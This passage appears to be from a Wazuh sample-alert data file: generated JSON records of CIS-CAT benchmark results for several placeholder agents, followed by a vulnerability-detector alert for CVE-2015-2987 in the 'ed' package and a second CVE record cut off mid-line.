1","notchecked":2,"score":65,"pass":55,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":24,"result":"unknown"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":8,"description":"Sample alert 2","id":"684","mail":false,"groups":["ciscat"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":68,"rule_title":"CIS-CAT 2","notchecked":0,"score":11,"pass":26,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":77,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":4,"description":"Sample alert 4","id":"2819","mail":false,"groups":["ciscat"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":23,"rule_title":"CIS-CAT 1","notchecked":1,"score":49,"pass":13,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":11,"result":"es"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":13,"description":"Sample alert 2","id":"702","mail":false,"groups":["ciscat"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":44,"rule_title":"CIS-CAT 4","notchecked":5,"score":37,"pass":63,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":89,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"Sample alert 5","id":"1839","mail":false,"groups":["ciscat"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":81,"rule_title":"CIS-CAT 6","notchecked":2,"score":2,"pass":1,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":68,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"Sample alert 4","id":"1899","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":85,"rule_title":"CIS-CAT 2","notchecked":1,"score":20,"pass":59,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":84,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":4,"description":"Sample alert 2","id":"2808","mail":false,"groups":["ciscat"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":85,"rule_title":"CIS-CAT 2","notchecked":5,"score":46,"pass":31,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":10,"result":"es"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":2,"description":"Sample alert 5","id":"2840","mail":false,"groups":["ciscat"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":97,"rule_title":"CIS-CAT 5","notchecked":3,"score":34,"pass":35,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":43,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"Sample alert 3","id":"5978","mail":false,"groups":["ciscat"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":38,"rule_title":"CIS-CAT 1","notchecked":5,"score":58,"pass":71,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":85,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":3,"description":"Sample alert 5","id":"3237","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":88,"rule_title":"CIS-CAT 5","notchecked":1,"score":66,"pass":52,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":68,"result":"es"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":1,"description":"Sample alert 4","id":"2993","mail":false,"groups":["ciscat"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":52,"rule_title":"CIS-CAT 1","notchecked":2,"score":25,"pass":68,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":76,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":9,"description":"Sample alert 5","id":"2141","mail":false,"groups":["ciscat"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":67,"rule_title":"CIS-CAT 5","notchecked":4,"score":95,"pass":78,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":69,"result":"es"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":9,"description":"Sample alert 3","id":"5805","mail":false,"groups":["ciscat"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":65,"rule_title":"CIS-CAT 1","notchecked":4,"score":44,"pass":36,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":91,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":4,"description":"Sample alert 2","id":"5561","mail":false,"groups":["ciscat"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":76,"rule_title":"CIS-CAT 3","notchecked":4,"score":85,"pass":28,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":35,"result":"es"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"Sample alert 1","id":"2087","mail":false,"groups":["ciscat"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":75,"rule_title":"CIS-CAT 6","notchecked":4,"score":54,"pass":58,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":4,"result":"es"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":4,"description":"Sample alert 2","id":"3402","mail":false,"groups":["ciscat"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":11,"rule_title":"CIS-CAT 5","notchecked":5,"score":64,"pass":20,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":64,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":9,"description":"Sample alert 3","id":"5032","mail":false,"groups":["ciscat"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":37,"rule_title":"CIS-CAT 4","notchecked":4,"score":0,"pass":11,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":70,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":14,"description":"Sample alert 2","id":"2352","mail":false,"groups":["ciscat"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":87,"rule_title":"CIS-CAT 3","notchecked":3,"score":65,"pass":74,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":7,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":4,"description":"Sample alert 4","id":"5484","mail":false,"groups":["ciscat"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":59,"rule_title":"CIS-CAT 5","notchecked":3,"score":65,"pass":26,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":79,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":8,"description":"Sample alert 3","id":"4635","mail":false,"groups":["ciscat"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":28,"rule_title":"CIS-CAT 2","notchecked":5,"score":58,"pass":8,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":97,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"Sample alert 4","id":"426","mail":false,"groups":["ciscat"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":62,"rule_title":"CIS-CAT 3","notchecked":5,"score":23,"pass":83,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":15,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":1,"description":"Sample alert 5","id":"1567","mail":false,"groups":["ciscat"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":26,"rule_title":"CIS-CAT 6","notchecked":4,"score":29,"pass":54,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":88,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"Sample alert 5","id":"3333","mail":false,"groups":["ciscat"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":49,"rule_title":"CIS-CAT 2","notchecked":0,"score":51,"pass":2,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":41,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":13,"description":"Sample alert 3","id":"3284","mail":false,"groups":["ciscat"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":48,"rule_title":"CIS-CAT 5","notchecked":4,"score":18,"pass":87,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":33,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"Sample alert 3","id":"2626","mail":false,"groups":["ciscat"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":89,"rule_title":"CIS-CAT 1","notchecked":4,"score":53,"pass":62,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":54,"result":"es"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"Sample alert 2","id":"422","mail":false,"groups":["ciscat"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":84,"rule_title":"CIS-CAT 6","notchecked":4,"score":99,"pass":82,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":60,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":12,"description":"Sample alert 4","id":"112","mail":false,"groups":["ciscat"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":41,"rule_title":"CIS-CAT 4","notchecked":2,"score":16,"pass":92,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":96,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"Sample alert 2","id":"5565","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":91,"rule_title":"CIS-CAT 6","notchecked":2,"score":33,"pass":77,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":32,"result":"es"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":12,"description":"Sample alert 2","id":"2565","mail":false,"groups":["ciscat"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":26,"rule_title":"CIS-CAT 4","notchecked":0,"score":96,"pass":30,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":4,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":9,"description":"Sample alert 1","id":"3334","mail":false,"groups":["ciscat"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":71,"rule_title":"CIS-CAT 1","notchecked":5,"score":98,"pass":34,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":48,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"Sample alert 2","id":"5080","mail":false,"groups":["ciscat"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":65,"rule_title":"CIS-CAT 4","notchecked":3,"score":83,"pass":52,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":98,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":14,"description":"Sample alert 2","id":"2309","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":70,"rule_title":"CIS-CAT 4","notchecked":3,"score":31,"pass":52,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":78,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":12,"description":"Sample alert 4","id":"4820","mail":false,"groups":["ciscat"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":6,"rule_title":"CIS-CAT 6","notchecked":2,"score":0,"pass":7,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":36,"result":"es"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":13,"description":"Sample alert 5","id":"5126","mail":false,"groups":["ciscat"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":3,"rule_title":"CIS-CAT 2","notchecked":1,"score":19,"pass":83,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":5,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":4,"description":"Sample alert 2","id":"5305","mail":false,"groups":["ciscat"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":99,"rule_title":"CIS-CAT 1","notchecked":0,"score":0,"pass":20,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":46,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":3,"description":"Sample alert 2","id":"925","mail":false,"groups":["ciscat"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":43,"rule_title":"CIS-CAT 6","notchecked":1,"score":75,"pass":28,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":52,"result":"es"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":6,"description":"Sample alert 2","id":"277","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":86,"rule_title":"CIS-CAT 3","notchecked":5,"score":84,"pass":54,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":63,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"Sample alert 2","id":"77","mail":false,"groups":["ciscat"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":10,"rule_title":"CIS-CAT 2","notchecked":1,"score":46,"pass":37,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":35,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":8,"description":"Sample alert 2","id":"1151","mail":false,"groups":["ciscat"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":93,"rule_title":"CIS-CAT 3","notchecked":3,"score":13,"pass":42,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":68,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":4,"description":"Sample alert 2","id":"3752","mail":false,"groups":["ciscat"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":55,"rule_title":"CIS-CAT 4","notchecked":3,"score":54,"pass":20,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":62,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":9,"description":"Sample alert 3","id":"2291","mail":false,"groups":["ciscat"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":23,"rule_title":"CIS-CAT 5","notchecked":1,"score":95,"pass":68,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":97,"result":"es"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":9,"description":"Sample alert 4","id":"2466","mail":false,"groups":["ciscat"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":89,"rule_title":"CIS-CAT 6","notchecked":0,"score":42,"pass":25,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":69,"result":"es"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"Sample alert 3","id":"598","mail":false,"groups":["ciscat"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":54,"rule_title":"CIS-CAT 2","notchecked":2,"score":32,"pass":64,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":23,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":9,"description":"Sample alert 5","id":"4816","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":95,"rule_title":"CIS-CAT 6","notchecked":2,"score":11,"pass":98,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":95,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":6,"description":"Sample alert 3","id":"3079","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":30,"rule_title":"CIS-CAT 5","notchecked":1,"score":57,"pass":35,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":33,"result":"es"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":14,"description":"Sample alert 5","id":"4497","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":17,"rule_title":"CIS-CAT 4","notchecked":4,"score":84,"pass":31,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":67,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"Sample alert 3","id":"5071","mail":false,"groups":["ciscat"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":36,"rule_title":"CIS-CAT 1","notchecked":0,"score":0,"pass":77,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":72,"result":"es"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"Sample alert 5","id":"2703","mail":false,"groups":["ciscat"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":90,"rule_title":"CIS-CAT 5","notchecked":3,"score":73,"pass":6,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":6,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"CVE-2015-2987 affects ed","id":"23503","firedtimes":9,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"ed","version":"1.10-2.1","architecture":"amd64","condition":"Package less or equal than 3.4"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"high","authentication":"none","confidentiality_impact":"partial","integrity_impact":"none","availability":"none"},"base_score":"2.600000"}},"cve":"CVE-2015-2987","title":"Type74 ED before 4.0 misuses 128-bit ECB encryption for small files, which makes it easier for attackers to obtain plaintext data via differential cryptanalysis of a file with an original length smaller than 128 bits.","severity":"Low","published":"2015-08-28","updated":"2015-08-31","state":"Fixed","cwe_reference":"CWE-17","references":["http://jvn.jp/en/jp/JVN91474878/index.html","http://jvndb.jvn.jp/jvndb/JVNDB-2015-000119","http://type74.org/edman5-1.php","http://type74org.blog14.fc2.com/blog-entry-1384.html","https://nvd.nist.gov/vuln/detail/CVE-2015-2987"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"CVE-2020-8631 affects 